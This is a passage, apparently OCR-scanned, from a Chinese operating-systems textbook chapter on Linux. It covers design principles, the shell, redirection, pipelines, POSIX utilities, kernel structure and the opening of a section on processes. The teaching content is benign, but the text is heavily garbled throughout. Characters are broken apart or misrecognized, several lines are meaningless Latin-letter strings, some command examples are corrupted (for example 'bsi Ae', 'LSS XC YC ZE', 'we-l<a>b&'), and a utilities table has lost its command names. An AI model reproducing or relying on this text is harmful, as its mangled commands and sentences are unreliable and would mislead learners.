为 了 那些 对 Linux 不 熟悉 的 用 户 的 利益 ， 在 这 一 节 我 们 将 对 Linux 本 
身 以 及 如 何 使 用 Linux 进 行 简单 的 介绍 。 几 乎 本 节 介 绍 的 所 有 内 容 同 样 
适用 于 所 有 与 UNIX 相 差不多 的 UNIX 衍 生 系 统 。 虽 然 Linux 有 多 个 图 形 
界面 ， 但 在 这 里 我 们 关注 的 是 在 X 系 统 的 shell 窗 口中 工作 的 程序 员 眼 中 
的 Linux 界 面 。 在 随后 的 几 节 中 ， 我 们 将 关注 系统 调用 以 及 它们 是 如 何 
在 内 核 中 工作 的 。 


10.2.1 _ Linux 的 设计 目标 


一 直 以 来 ，UNIX 都 被 设计 成 一 种 能 够 同时 处 理 多 进程 和 多 用 户 的 
交互 式 系统 。 它 是 由 程序 员 设 计 的 ， 也 是 给 程序 员 使 用 的 ， 而 使 用 它 的 
APRS BRA AIF HARES CHB ARAN) 软件 开发 项 
目 。 在 很 多 情况 下 ， 通 常 是 大 量 的 程序 员 通 过 积极 的 合作 来 开发 一 个 单 
一 的 系统 ， 因 此 UNIX 有 广泛 的 工具 来 文 持 在 可 控制 的 条 件 下 的 多 人 合 
作 和 信息 共享 。 一 组 有 经 验 的 程序 员 共 同 开发 一 个 复杂 软件 的 模式 显然 
和 一 个 初学 者 独立 地 使 用 一 个 文档 编辑 器 的 个 人 计算 机 模式 有 显著 区 
别 ， 而 这 种 区 别 在 UNIX 系 统 中 自始至终 部 有 所 反映。Linux 系 统 自 然而 
然 地 继承 了 这 些 设 计 目 标 ， 尺 管 它 的 第 一 个 版 本 是 面向 个 人 电脑 的 。 





























好 的 程序 员 追 求 什么 样 的 系统 ? 首先， 大 多 数 程序 员 喜 欢 让 系统 尽 
量 简单 ， 优 雅 ， 并 且 具 有 一 致 性 。 比 如 ， 从 最 底层 的 角度 来 讲 ， 一 个 文 
件 应 该 只 是 一 个 字 节 集合 。 为 了 实现 顺序 存 取 、 随 机 存 取 、 按 键 存 取 、 
远程 存 取 等 而 设计 不 同类 型 的 文件 〈 像 大 型 机 一 样 ) 只 会 碍 事 。 类 似 
地 ， 如 果 命 令 





ls A* 


的 意思 是 列举 出 所 有 以 “A? 打 头 的 文件 ， 那 么 命令 





rm A* 





EIS) eek Et IT AL BR PTA AAP FT SKE SCE TID AS 2 HH BR SCE 
是 “A*” 的 那个 文件 。 这 个 特性 有 时 被 称 为 最 小 惊讶 原理 。 





有 经 验 的 程序 员 通 各 还 希望 系统 具有 较 强 的 功能 性 和 有 灵活 性 。 这 意 
味 着 一 个 系统 应 该 具有 较 小 的 一 组 基本 元 素 ， 而 这 些 元 系 可 有 多 种 多 样 
的 组 合 方 式 来 满足 各 种 应 用 需要 。 设 计 Linux 的 一 个 基本 指导 方针 束 是 
每 个 程序 应 该 只 做 一 件 事 并 且 把 它 做 好 。 因 此 ， 编 译 需 不 会 产生 列表 ， 
因为 有 其 他 的 程序 可 以 更 好 地 实现 这 个 功能 。 




















最 后 ， 大 多 数 程序 员 非 常 反感 没 用 的 元 余 。 如 果 cp 可 以 胜任 ， 那 么 
为 什么 还 需要 copy? 为 了 从 文件 f 中 提取 所 有 包含 字符 串 “ard” 的 行 ， 
Linux 程 序 员 输 入 








grep ard f 





另外 一 种 方法 是 让 程序 员 先 选择 grep 程 序 〈 不 带 参数 ) ， 然 后 让 
grep 程 序 自己 宣布 说 “你 好 ， 我 是 grep， 我 在 文件 中 寻找 模式 。 请 输入 你 
要 寻找 的 模式 。” 在 输入 一 个 模式 之 后 ，grep 程 序 要 求 输 入 一 个 文件 
名 。 然 后 它 再 提问 是 否 还 有 别 的 文件 。 最 后 ， 它 忆 结 需要 执行 的 任务 并 
且 询 问 是 否 正确 。 尽 管 这 样 的 用 尸 界面 可 能 适合 初学 者 ， 但 它 会 把 有 经 
验 的 程序 员 逼 疡 。 他 们 想 要 的 是 一 个 人 用 人 ， 不 是 一 个 保姆 。 























10.2.2 ”到 Linux 的 接口 





一 个 Linux 系 统 可 被 看 成 一 座 金 字 塔 ， 如 图 10-1 所 示 。 最 底层 的 是 
硬件 ， 包 括 CPU、 内 存 、 磁 盘 、 显 示 器 、 键 盘 以 及 其 他 设备 。 运 行 在 硬 
件 之 上 的 是 操作 系统 。 它 的 作用 是 控制 硬件 并 且 为 其 他 程序 提供 系统 调 
用 接口 。 这 些 系统 调用 允许 用 户 程序 创立 并 管理 进程 、 文 件 以 及 其 他 资 
源 。 


用 户 接口 









标准 实用 程序 
(Cshell、 编 辑 器 、 编 译 器 等 ) 













系统 调用 用 户 态 
接口 标准 库 函 数 
(open、close、read、write、fork 等 ) | 
Linux 操 作 系统 核心 态 
(进程 管理 、 存 储 管理 、 文 件 系统 、IO 等 ) ta 






人 硬件 


(CPU. Aff. Watt. Hima) 





图 10-1 Linux 系 统 中 的 层次 结构 





程序 通过 把 参数 放 入 寄存 器 (有 时 是 栈 ) 来 调用 系统 调用 ， 并 发 出 
陷阱 指令 从 用 户 模 式 切 换 到 内 核 模 式 。 由 于 不 能 用 C 语 言 写 一 条 陷阱 指 
令 ， 因 此 系统 提供 了 一 个 库 ， 每 个 函数 对 应 一 个 系统 调用 。 这 些 函 数 是 


用 汇编 语言 写 的 ， 不 过 可 以 从 C 中 调用 。 每 一 个 函数 首先 将 参数 放 到 合 
适 的 地 方 ， 然 后 执行 陷阱 命令 。 因 此 ， 为 了 执行 read 系 统 调用 ， 一 个 C 
程序 需要 调用 read 库 函数 。 值 得 一 提 的 是 ， 由 POSIX 指 定 的 是 库 接 口 ， 

而 不 是 系统 调用 接口 。 换 句 话说 ，POSIX 规 定 哪些 库 函 数 是 一 个 符合 标 
准 规范 的 系统 必须 提供 的 ， 它 们 的 参数 是 什么 ， 它 们 的 功能 是 什么 ， 以 
及 它们 返回 什么 样 的 结果 。POSIX 根 本 没有 提 到 真正 的 系统 调用 。 








除了 操作 系统 和 系统 调用 库 ， 所 有 版 本 的 Linux 必 须 提供 大 量 的 标 
准 程序 ， 其 中 一 些 是 由 POSIX 1003.2 标 准 指定 的 ， 其 他 的 根据 不 同 版 本 
的 Linux 而 有 所 不 同 。 它 们 包括 命令 处 理 旨 Cshell) 、 编 译 妖 、 编 辑 
器 、 文 本 处 理 程序 以 及 文件 操作 工具 。 用 户 使 用 键盘 调用 的 是 上 述 这 些 
程序 。 因 此 ， 我 们 可 以 说 Linux 具 有 三 种 不 同 的 接口 : 真正 的 系统 调用 
接口 、 库 函数 接口 和 由 标准 应 用 程序 构成 的 接口 。 





大 多 数 的 Linux 个 人 计算 机 发 行 版 都 把 上 述 的 面 问 键盘 的 用 户 界面 
答 换 为 面 问 鼠标 的 图 形 用 户 界 面 ， 而 根本 没有 修改 操作 系统 本 身 。 正 是 
这 种 灵活 性 让 Linux 如 此 流行 并 且 在 经 历 了 如 此 多 的 技术 革新 后 存活 下 
来 。 





Linux 的 GUI 和 最 初 在 20 世 纪 70 年 代为 UNIX 系 统 开 发 的 、 后 来 由 于 
Macintosh 和 Windows 变 得 流行 的 GUI 非 常 相似 。 这 种 GUI 创 建 一 个 桌面 
环境 ， 包 括 窗口 、 图 标 、 文 件 夹 、 工 具 栏 和 拖 搜 功能 。 一 个 完整 的 桌面 
环境 包含 一 个 窗口 管理 器 《负责 控制 窗口 的 摆 放 和 外 观 ) ， 以 及 各 种 应 








用 程序 ， 并 且 提 供 一 个 一 致 的 图 形 界 面 。 比 较 流 行 的 Linux 桌 面 环境 包 
括 GNOME (GNU 网 络 对 象 模型 环境 ) 和 KDE (KER AGE) 。 


Linux 上 的 GUI 由 XX 窗口 系统 (常常 称 为 X11 或 者 X〉 所 支持 ， 它 负 

责 定义 用 于 UNIX 和 类 UNIX 系 统 中 基于 位 图 显示 的 操作 窗口 的 通信 和 显 
示 协 议 。 其 主要 组 成 部 分 X 服 务 器 ， 控 制 键盘 、 鼠 标 、 显 示 器 等 设备 ， 

并 负责 输入 重 定向 或 者 从 客户 程序 接受 输出 。 实 际 的 GUI 环境 通常 构建 
在 一 个 包含 与 X 服 务 器 进行 交互 功能 的 低层 库 xlib 上 。 图 形 界面 将 X11 的 
基本 功能 进行 拓展 ， 丰 富 了 窗口 的 显示 ， 提 供 按钮 、 菜 单 、 图 标 以 及 其 
他 选项 。X 服 务 器 可 以 通过 命令 行 手 动 启动 ， 不 过 通常 在 启动 过 程 中 由 
一 个 负责 显示 用 户 登录 图 形 界面 的 显示 管理 器 启动 。 























当 在 Linux 上 使 用 图 形 界 面 时 ， 用 户 可 以 通过 鼠标 点 击 运行 程序 或 
者 打开 文件 ， 通 过 拖拉 将 文件 从 一 个 地 方 复制 到 为 一 个 地 方 等 。 男 外 ， 
用 户 也 可 以 启动 一 个 终端 模拟 程序 xterm， 它 为 用 户 提供 一 个 到 操作 系 
统 的 基本 命令 行 界 面 。 下 面 一 拉 有 关于 它 的 详细 描述 。 





10.2.3 shell 


尽管 Linux 系 统 具 有 图 形 用 户 界面 ， 然 而 大 多 数 程序 员 和 高 级 用 户 
都 更 愿意 使 用 一 个 命令 行 界面 ， 称 作 shell。 通 常 这 些 用 户 在 图 形 用 户 界 
面 中 启动 一 个 或 更 多 的 shell 窗 口 ， 然 后 就 在 这 些 shell 窗 口中 工作 。shell 
命令 行 界面 使 用 起 来 更 快速 ， 功 能 更 强大 ， 扩 展 性 更 好 ， 并 且 让 用 户 不 
会 遭受 由 于 必须 一 直 使 用 鼠标 而 引起 的 肢体 重复 性 劳损 RSD 。 接 下 
来 我 们 简要 介绍 一 下 bash shell (bash) 。 它 是 基于 UNIX 最 原始 的 
shell (Bourne shell) 的 ， 而 且 实际 上 它 的 名 字 也 是 Bourne Again shell 的 
首 字母 缩写 。 经 常 使 用 的 还 有 很 多 其 他 的 shell (ksh，csh 等 ) ， 但 是 
bash 是 大 多 数 Linux 系 统 的 默认 shell。 








当 shel 被 启动 时 ， 它 初始 化 自己 ， 然 后 在 屏幕 上 输出 一 个 提示 符 
(prompt) ， 通 常 是 一 个 百 分 号 或 者 美元 符号 ， 并 等 待 用 户 输入 命令 


行 。 











等 用 户 输入 一 个 命令 行 后 ，shell 提 取 其 中 的 第 一 个 字 ， 假 定 这 个 字 
古 将 要 运行 程序 的 程序 名 ， 搜 索 这 个 程序 ， 如 果 找 到 了 这 个 程序 就 运 
它 。 然 后 ，shell 会 将 自己 挂 起 直到 该 程序 运行 完毕 ， 之 后 再 尝试 读 入 下 

一 条 命令 。 重 要 的 是 ，shell 也 只 是 一 个 普通 用 户 程序 。 它 仅仅 需要 从 键 
盘 读 取 数 据 、 同 显示 器 输出 数据 和 运行 其 他 程序 的 能 








参数 ， 它 们 作为 字符 串 传 给 所 调用 的 程序 。 比 
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cp src dest 


调用 cp 程序 并 包含 两 个 参数 ，src 和 dest。 这 个 程序 将 第 一 个 参数 解 
释 为 一 个 现存 的 文件 名 ， 然 后 创建 该 文件 的 一 个 副本 ， 其 名 称 为 dest。 


并 不 是 所 有 的 参数 都 是 文件 名 。 在 命令 行 


head -20 file 





中 ， 第 一 个 参数 -20 通 知 head 程 序 输出 fle 中 的 前 20 行 ， 而 不 是 默认 
的 10 行 。 负 责 控制 一 个 命令 的 操作 或 者 指定 一 个 可 选 数值 的 参数 称 为 标 
志 Cflag) ， 习 惯 上 由 一 个 破 折 号 标记 。 为 了 避免 发 义 ， 这 个 破 折 号 是 
必要 的 ， 比 如 


head 20 file 





是 一 个 完全 合法 的 命令 ， 它 告诉 head 程 序 输出 文件 名 为 20 的 文件 的 
前 10 行 ， 然 后 输出 文件 名 为 fle 的 文件 的 前 10 行 。 大 多 数 Linux 命 令 接 受 
多 个 标志 和 多 个 参数 。 


为 了 更 容易 地 指定 多 个 文件 名 ，shel 文 持 魔 法 字符 ， 有 时 称 为 通 配 
人 符 。 比 如 ， 一 个 星 号 可 以 匹配 所 有 可 能 的 字符 串 ， 因 此 


bsi Ae 





告诉 ls 列举 出 所 有 文件 名 以 .c 结 束 的 文件 。 如 果 同 时 存在 文件 x.c， 


y.c，Zz.c， 那 么 上 述 命 令 等 价 于 下 面 的 命令 


LSS XC YC ZE 








另 一 个 通配符 是 问号 ， 负 责 匹 配 任意 一 个 字符 。 一 组 在 中 括号 中 的 
字符 可 以 表示 其 中 的 任意 一 个 ， 因 此 





ls [ape] * 
列举 出 所 有 以 “a”，“p” 或 者 “e” 开 头 的 文件 。 


像 shell 这 样 的 程序 不 一 定 非 要 通过 终端 (键盘 和 显示 器 进行 输入 
和 输出。 当 它 《或 者 任何 其 他 程序 ) 启动 时 ， 它 自动 获得 了 对 标准 输入 
负责 正常 输入 ) ， 标 准 输出 《负责 正常 输出 ) 和 标准 错误 《负责 输出 
错误 信息 ) 文件 进行 访问 的 能 力 。 正 常情 况 下 ， 上 述 三 个 文件 默认 地 都 
指 加 终端， 因此 标准 的 输出 是 从 键盘 输入 的 ， 而 标准 输出 或 者 标准 错误 
征 输出 到 显示 需 的 。 许 多 Linux 程 序 默 认 从 标准 输入 进行 输入 并 从 标准 
输出 进行 输出 。 比 如 











sort 


调用 sort 程 序 ， 其 从 终端 读 取 数据 (直到 用 户 输 入 Ctrl-D 表 示 文 件 结 


束 ) ， 根 据 字 母 顺 序 将 它们 排序 ， 然 后 将 结果 输出 到 屏幕 上 。 

也 可 以 对 标准 输入 和 输出 进行 重 定位 ， 因 为 这 种 情况 通 向 会 很 有 
用 。 对 标准 输入 进行 重 定位 的 语法 使 用 一 个 小 于 号 《过 ) 加 上 紧 接 的 一 
个 输入 文件 名 。 类 似 的 ， 标 准 输出 可 以 通过 一 个 大 于 号 《> ) 进行 重 定 
位 。 人 允许 在 一 个 命令 中 对 两 者 同时 进行 重 定位 。 比 如 ， 下 面 的 命令 : 


sort<in>out 





使 得 sort 从 文件 h 中 得 到 输入 ， 并 把 结果 输出 到 文件 out 中 。 由 于 标 
准 错 误 没 有 被 重 定 位 ， 因 此 所 有 的 错误 信息 会 输出 到 屏幕 中 。 一 个 从 标 
准 输入 中 读 取 数 据 ， 对 数据 进行 条 种 处 理 ， 然 后 输出 到 标准 输出 的 程序 
称 为 过 滤器 (filter) 。 


考 夸 下 面 一 条 包括 三 条 独立 命令 的 命令 行 : 





sort<in>temp;head-30<temp;rm temp 


首先 它 运 行 sort， 从 hn 得 到 输入 然后 将 结果 输出 到 temp 中 。 完 成 
后 ，shell 运 行 head， 令 其 将 temp 的 前 30 行 内 容 输出 到 标准 输出 中 ， 默 认 
为 终端 。 最 后 ， 临 时 文件 temp 被 删除 。 


常 兽 有 把 命令 行 中 第 一 个 程序 的 输出 作为 下 一 个 程序 的 输入 这 种 情 
况 。 在 上 面 的 例子 中 ， 我 们 使 用 temp 文 件 来 保存 这 个 输出 。 然 而 ， 


Linux 提 供 了 一 种 更 简单 的 方法 来 达到 相同 的 结果 。 在 命令 行 


sort<in|head-30 


F, BI, EPERRA EIEI (pipe symbol) ， 告 诉 程序 从 sort 中 
得 到 输出 并 且 将 其 作为 输入 传 给 head， 由 此 消除 了 创建 、 使 用 和 删除 一 
个 临时 文件 的 过 程 。 由 管道 符 连 接 起 来 的 命令 ， 称 为 一 个 管线 
(pipeline) ， 可 以 包含 任意 多 的 命令 。 一 个 由 四 个 部 分 组 成 的 管线 如 
下 所 示 : 








grep ter*.t|sort|head-20|tail-5>foo 





这 里 所 有 以 .t 结 尾 的 文件 中 包含 “ter” 的 行 被 写 到 标准 输出 中 ， 然 后 
被 排序 。 这 些 内容 的 前 20 行 被 head 选 择 出 来 并 传 给 tail， 它 又 将 最 后 5 行 
《也 即 排 完 序 的 列表 中 的 第 16 到 20 行 ) 传 给 foo。 这 个 例子 显示 了 Linux 
是 如 何 提供 了 一 组 各 负责 一 项 任务 的 基本 单元 《一 些 过 滤器 ) 和 一 个 几 
乎 可 以 用 无 穷 的 方式 把 它们 组 合 起 来 的 机 制 。 





Linux 是 一 种 通用 多 道 程 序 设 计 系 统 。 一 个 用 户 可 以 同时 运行 多 个 
程序 ， 每 一 个 作为 一 个 独立 的 进程 存在 。 在 shell 中 ， 后 台 运 行 一 个 程序 
的 语法 是 在 原本 命令 后 加 一 个 “&”。 因 此 





we-l<a>b& 


运行 字数 统计 程序 wc， 来 统计 输入 文件 a 中 的 行 数 (J 标志 ) ， 并 
将 结果 输出 到 b 中 ， 不 过 整个 过 程 都 在 后 全 运行 。 命 令 一 被 输入 ，shell 
和 输出 提示 符 就 可 以 接收 并 处 理 下 一 条 命令 。 管 线 也 可 以 在 后 合 中 运行 ， 
比如 下 面 的 指令 : 


sort<x|head& 


多 个 管线 也 可 以 同时 在 后 台中 运行 。 


10.2.4 ”Linux 应 用 程序 


Linux 的 命令 行 “shell) 用 户 界 面包 含 大 量 的 标准 应 用 程序 。 这 些 
程序 可 以 大 致 分 成 以 下 6 类 : 


1) 文 件 和 目录 操作 命令 
HAE 


3) 程 序 设计 工具 ， 如 编辑 器 和 编译 器 。 
4) 文档 处 理 。 

5) 系 统管 理 。 

6) 其 他 。 


POSIX 1003.2 标 准 规定 了 100 种 左右 关于 上 述 程序 的 语法 和 语义 ， 
主要 是 前 三 类 中 的 程序 。 让 这 些 程序 具有 统一 的 标准 主要 是 为 了 实现 让 
任何 人 写 的 shell 脚 本 可 以 在 任何 Linux 系 统 上 运行 。 





除了 这 些 标准 应 用 程序 外 ， 当 然 还 有 许多 其 他 应 用 程序 ， 比 如 Web 
浏览 器 ， 图 片 浏览 器 等 


下 面 我 们 看 一 看 一 些 程序 的 例子 ， 首 先 从 文件 和 目录 操作 开始 。 


cp ab 





将 文件 a 移动 到 b， 而 不 改变 原文 件 。 相 比 之 下 


mv ab 


将 文件 a 移动 到 b 但 是 删除 原文 件 。 从 效果 上 来 看 ， 它 是 文件 移动 而 
不 是 通常 意义 上 的 复制 。cat 命 令 可 以 把 多 个 文件 的 内 容 连 接 起 来 ， 它 读 
入 每 一 个 输入 文件 然后 把 它们 按 顺 序 复制 到 标准 输出 中 。 可 以 通过 rm 命 
令 来 删除 文件 。 命 令 chmod 可 以 让 属 主 通 过 修改 文件 的 权限 位 来 改变 其 
访问 权限 。 使 用 mkdir 和 rmdir 命 令 可 以 分 别 实 现 目 录 的 创建 和 删除 。 为 
了 列 出 一 个 目录 下 的 文件 ， 可 以 使 用 ls 命令 。 筷 包含 大 量 的 标志 来 控制 
要 显示 文件 的 哪些 特征 “如 大 小 、 用 户 、 群 、 创 建 日 期 ) 、 决 定 文 件 的 
显示 顺序 〈 如 字母 序 、 修 改 日 期 、 逆 序 ) 、 指 定 文件 输出 格式 等 。 

















我 们 已 经 见 到 了 很 多 过 滤器 : grep 从 标准 输入 或 者 一 个 或 多 个 输入 
文件 中 提取 包含 特定 模式 的 行 ，sort 将 输入 进行 排序 并 输出 到 标准 输 
出 :head 提取 输入 的 前 几 行 ; tail 提取 输入 的 后 几 行 。 其 他 的 由 1003.2 定 
义 的 过 滤器 有 : cut 和 paste， 它 们 实现 一 段 文档 的 剪 切 和 粘贴 ，od 将 输 
入 (通常 是 二 进 制 ) 转换 成 ASCII 文 档 ， 包 括 八 进 制 ， 十 进 制 或 者 十 六 
进 制 ，tr 实 现 字 符 大 小 写 转换 (如 小 写 换 大 写 ) ，pr 为 打印 机 格式 化 输 
出 ， 包 括 一 些 格式 选项 ， 如 运行 头 ， 页 码 等 。 


编译 器 和 程序 设计 工具 包括 gcc《〈 它 调用 C 语 言 编译 器 ) 以 及 ar CE 
将 库 函 数 收 集 到 存档 文件 中 ) 。 


另外 一 个 重要 的 工具 是 make， 它 负责 维护 大 的 程序 ， 这 些 程序 的 源 
常 分 布 在 多 个 文件 中 。 通 常 ， 其 中 一 些 文件 是 头 文件 Cheader 

file) ， 其 中 包括 类 型 、 变 量 、 宏 和 其 他 声明 。 源 文件 通常 使 用 include 
将 头 文件 包含 进来 。 这 样 ， 两 个 或 更 多 的 源 文件 可 以 共享 同样 的 声明 。 
然而 ， 如 果 头 文件 被 修改 ， 就 需要 找到 所 有 依赖 于 这 个 头 文件 的 源 文 件 
并 对 它们 重新 进行 编译 。make 的 作用 是 跟踪 哪些 文件 依赖 于 哪些 头 文 件 
等 ， 然 后 安排 所 有 需要 进行 的 编译 自动 进行 。 几 乎 所 有 的 Linux 程 序 ， 
除了 最 小 的 那些 ， 都 是 依靠 make 进 行 编 译 的 。 














一 部 分 POSIX 标 准 应 用 程序 列 在 图 10-2 中 ， 包 括 每 个 程序 的 简要 说 
明 。 所 有 Linux 系 统 中 都 有 这 些 程序 以 及 许多 其 他 标准 的 应 用 程序 。 


将 多 个 文件 连接 到 标准 输出 
修改 文件 保护 模式 
复制 一 个 或 多 个 文件 

从 一 个 文件 中 剪 切 一 段 文字 
在 文件 中 检索 给 定 模式 
提取 文件 的 前 几 行 
FIs | 列 出 目录 

编译 文件 生成 二 进 制 文件 
od | 以 八进制 显示 一 个 文件 

将 一 段 文字 粘贴 到 一 个 文件 中 
为 打印 格式 化 文件 

ps ”| 列 出 正在 运行 的 进程 
删除 一 个 或 多 个 文件 

删除 一 个 目录 

对 文件 中 的 所 有 行 按照 字母 序 进行 排序 
提取 文件 的 最 后 几 行 

在 字符 集 之 间 转 换 


图 10-2 POSIX 定 义 的 一 些 常见 的 Linux 应 用 程序 
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10.2.5 “内核 结构 


在 图 10-1 中 我 们 看 到 了 Linux 系 统 的 总 体 结 构 。 在 进一步 研究 内 核 
的 组 成 部 分 ， 如 进程 调度 和 文件 系统 之 前 ， 我 们 先 从 整体 的 角度 看 一 下 


Linux 的 内 核 。 





内 核 坐 落 在 硬件 之 上 ， 负 责 实现 与 IO 设备 和 存储 管理 单元 的 交 
互 ， 并 控制 CPU 对 前 述 设备 的 访问 。 如 图 10-3 所 示 ， 在 最 底层 ， 内 核 包 
含 中 断 处 理 程 序 ， 它 们 是 与 设备 交互 的 主要 方式 ， 以 及 底层 的 分 派 机 
制 。 这 种 分 派 在 中 断 时 发 生 。 确 层 的 代码 中 止 正在 运行 的 进程 ， 将 其 状 
态 存储 在 内 核 进程 结构 中 ， 然 后 局 动 相 应 的 驱动 程序 。 进 程 分 派 也 在 内 
核 完成 条 些 操 作 ， 并 且 需 要 再 次 启动 一 个 用 户 进 程 时 发 生 。 进 程 分 派 的 
代码 是 汇编 代码 ， 并 且 和 进程 调度 代码 有 很 大 不 同 。 
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图 10-3 Linux 内核 结 构 


接 下 来 ， 我 们 将 内 核子 系统 分 为 三 个 主要 部 件 。 在 图 10-3 中 IO 部 件 
包含 所 有 负责 与 设备 交互 以 及 实现 联网 和 存储 的 MO 功能 的 内 核 部 件 。 
在 最 局 层 ， 这 些 IO 功 能 全 部 整合 在 一 个 虚拟 文件 系统 层 中 。 也 就 是 
说 ， 从 顶层 来 看 ， 对 一 个 文件 进行 读 操 作 ， 不 论 是 在 内 存 还 是 磁盘 中 ， 
都 和 从 终端 输入 中 读 取 一 个 字符 是 一 样 的 。 从 底层 来 看 ， 所 有 的 IO 操 
作 都 要 通过 茶 一 个 设备 驱动 器 。 所 有 的 Linux 驱 动 程序 都 可 以 被 分 类 为 
字符 驱动 程序 或 块 驱动 程序 ， 两 者 之 间 的 主要 区 别 是 块 设备 允许 奋 找 和 
随机 访问 而 字符 设备 不 允许。 从 技术 上 讲 ， 网 络 设备 实际 上 是 字符 设 














备 ， 不 过 它们 的 处 理 和 其 他 字符 设备 不 太一 样 ， 因 此 为 了 清晰 起 见 将 它 
们 单独 分 类 ， 如 图 10-3 所 示 。 


在 设备 驱动 程序 之 上 ， 每 个 设备 类 型 的 内 核 代 码 都 不 一 样 。 字 符 设 
备 有 两 种 不 同 的 使 用 方式 。 有 些 程序 ， 如 可 视 编 辑 器 Vi，emacs 等 ， 需 
要 每 一 个 键盘 输入 。 原 始 的 终端 Cty) IO 可 以 实现 这 种 功能 。 其 他 程 
序 ， 比 如 shell 等 ， 是 面向 行 的 ， 因 此 允许 用 户 在 输入 回 车 并 将 字符 串 发 
送 给 程序 之 前 整 行 地 进行 编辑 。 在 这 种 情况 下 ， 由 终端 流出 的 字符 流 需 
要 通过 一 个 所 谓 的 行规 划 ， 其 中 的 内 容 被 相应 地 格式 化 。 


网 络 软件 通常 是 模块 化 的 ， 由 不 同 的 设备 和 协议 来 支持 。 网 络 设备 
的 上 一 个 层次 负责 一 种 常规 程序 ， 确 保 每 一 个 包 和 被 送 到 正确 的 设备 或 协 
议 处 理 器 。 大 多 数 Linux 系 统 在 内 核 中 包含 一 个 完整 的 硬件 路 由 器 的 功 
能 ， 尽 管 其 性 能 比 硬 件 路 由 器 的 性 能 差 一些 。 在 路 由 器 代 码 之 上 的 是 实 
际 的 协议 栈 ， 它 总 是 包含 IP 和 TCP 协 议 ， 也 包含 一 些 其 他 协议 。 在 整个 
网 络 之 上 的 是 socket 接 口 ， 它 允许 程序 来 为 特定 的 网 络 和 协议 创建 
socket， 并 为 每 一 个 socket 返 回 一 个 等 用 的 文件 描述 符 。 


在 磁盘 驱动 絮 之 上 是 VO 调 度 器 ， 它 负 员 排序 和 分 配 人 磁盘 读 写 操 
作 ， 以 尽 可 能 减少 磁头 的 无 用 移动 或 者 满足 一 些 其 他 的 系统 原则 为 方 


块 设备 列 的 最 顶层 是 文件 系统 。Linux 允 许 ， 也 确实 有 多 个 文件 系 


统 同时 存在 。 为 了 向 文件 系统 的 实现 隐藏 不 同 硬件 设备 体系 之 间 的 区 
别 ， 一 个 通用 的 块 设备 层 提供 了 一 个 可 以 被 所 有 文件 系统 使 用 的 抽象 。 


图 10-3 的 右边 是 Linux 内 核 的 妃 外 两 个 重要 组 成 部 件 ， 它 们 负责 存 
储 和 进程 管理 任务 。 存 储 管理 任务 包括 维护 虚拟 内 存 到 物理 内 存 的 映 
射 ， 维 护 最 近 科 访问 页 面 的 缓存 以 及 实现 一 个 好 的 页 面 置换 算法 ， 并 且 
根据 需要 把 需要 的 数据 和 代码 页 读 入 内 存 中 。 





进程 管理 部 件 的 最 主要 任务 是 进程 的 创建 和 终止 。 它 还 包括 一 个 进 
程 调度 器 ， 负 责 选择 下 一 步 运 行 哪个 进程 或 线程 。 我 们 将 在 下 一 节 看 
到 ，Linux 把 进程 和 线程 简单 地 看 作 可 运行 的 实体 ， 并 使 用 统一 的 调度 
策略 对 它们 进行 调度 。 最 后 ， 信 和 号 处 理 的 代码 也 属于 进程 管理 部 件 。 











尽管 这 三 个 部 件 在 图 中 被 分 开 ， 实 际 上 它们 高 度 相 互 依赖 。 文 件 系 
统一 般 通 过 块 设备 进行 文件 访问 。 然 和 而， 为 了 隐藏 磁盘 读 取 的 严重 延 
人 迟 ， 文 件 被 复制 到 内 存 中 的 页 缓存 中 。 有 些 文件 甚至 可 能 是 动态 创建 的 
并 且 只 在 内 存 中 存在 ， 比 如 提供 运行 时 资源 使 用 情况 的 文件 。 力 外 ， 妆 
需要 清空 一 些 页 时 ， 虚 拟 存储 系统 可 能 依靠 一 个 磁盘 分 区 或 者 文件 内 的 
交换 区 来 备份 内 存 的 一 部 分 ， 因 此 依赖 于 MO 部 件 。 当 然 ， 还 存在 着 很 
多 其 他 的 组 件 之 间 的 相互 依赖 。 

















除了 内 核 内 的 静态 部 件 外 ，Linux 支 持 动态 可 装载 模块 。 这 些 模 块 
可 以 用 来 补充 或 者 丛 换 缺 省 的 设备 驱动 程序 、 文 件 系 统 、 网 络 或 者 其 他 


内 核 代码 。 在 图 10-3 中 没有 显示 这 些 模 块 。 


最 后 ， 处 在 最 项 层 的 是 到 内 核 的 系统 调用 接口 。 所 有 系统 调用 都 来 
自 这 里 ， 其 导致 一 个 陷阱 ， 并 将 系统 从 用 户 态 转换 到 受 保护 的 内 核 态 ， 
继而 将 控制 权 交 给 上 述 的 内 核 部 件 之 一 。 


10.3 Linux 中 的 进程 


前 面 的 几 个 小 节 是 从 键盘 的 角度 来 看 待 Linux， 也 就 是 说 以 用 户 在 
xterm 窗 口中 所 见 的 内 容 来 看 待 Linux。 我 们 给 出 了 常用 的 shell 命 令 和 标 
准 应 用 程序 作为 例子 。 最 后 ， 以 一 个 对 Linux 系 统 结构 的 简要 概括 作为 
结尾 。 现 在 ， 让 我 们 深入 到 系统 内 核 ， 更 仔细 地 研究 Linux 系 统 所 文 持 
的 基本 概念 ， 即 进程 、 内 存 、 文 件 系统 和 输入 /输出 。 这 些 概念 非常 重 
要 ， 因 为 系统 调用 到 操作 系统 的 接口 ) 将 对 这 些 概念 进行 操作 。 举 个 
例子 来 说 ，Linux 系 统 中 存在 着 用 来 创建 进程 和 线程 、 分 配 内 存 、 打 开 
文件 以 及 进行 输入 /输出 操作 的 系统 调用 。 


遗憾 的 是 ， 由 于 Linux 系 统 的 版 本 非常 之 多 ， 各 个 版 本 之 间 均 有 不 
同 。 在 这 一 半 里 ， 我 们 将 握 弃 着 眼 于 某 一 个 Linux 版 本 的 方法 ， 转 而 强 
调 各 个 版 本 的 共通 之 处 。 因 此 ， 在 茶 些 小 节 中 【特别 是 涉及 实现 方法 的 
小 节 ) ， 这 里 讨论 的 内 容 不 一 定 同样 适用 于 每 个 Linux 版 本 。 


10.3.1 基本 概念 
Linux 系 统 中 主要 的 活动 实体 就 是 进程 。Linux 进 程 与 我 们 在 第 2 章 


所 学 的 经 典 顺 序 进 程 极为 相似 。 每 个 进程 执行 一 段 独 立 的 程序 并 且 在 进 
程 初始 化 的 时 候 拥 有 一 个 独立 的 控制 线程 。 换 句 话 说 ， 每 一 个 进程 都 拥 





有 一 个 独立 的 程序 计数 器 ， 用 这 个 程序 计数 器 可 以 退 踪 下 一 条 将 要 航 执 
行 的 指令 。 一 旦 进程 开始 运行 ，Linux 系 统 将 允许 它 创 建 额外 的 线程 。 


由 于 Linux 是 一 个 多 道 程 序 设 计 系统 ， 因 此 系统 中 可 能 会 有 多 个 彼 
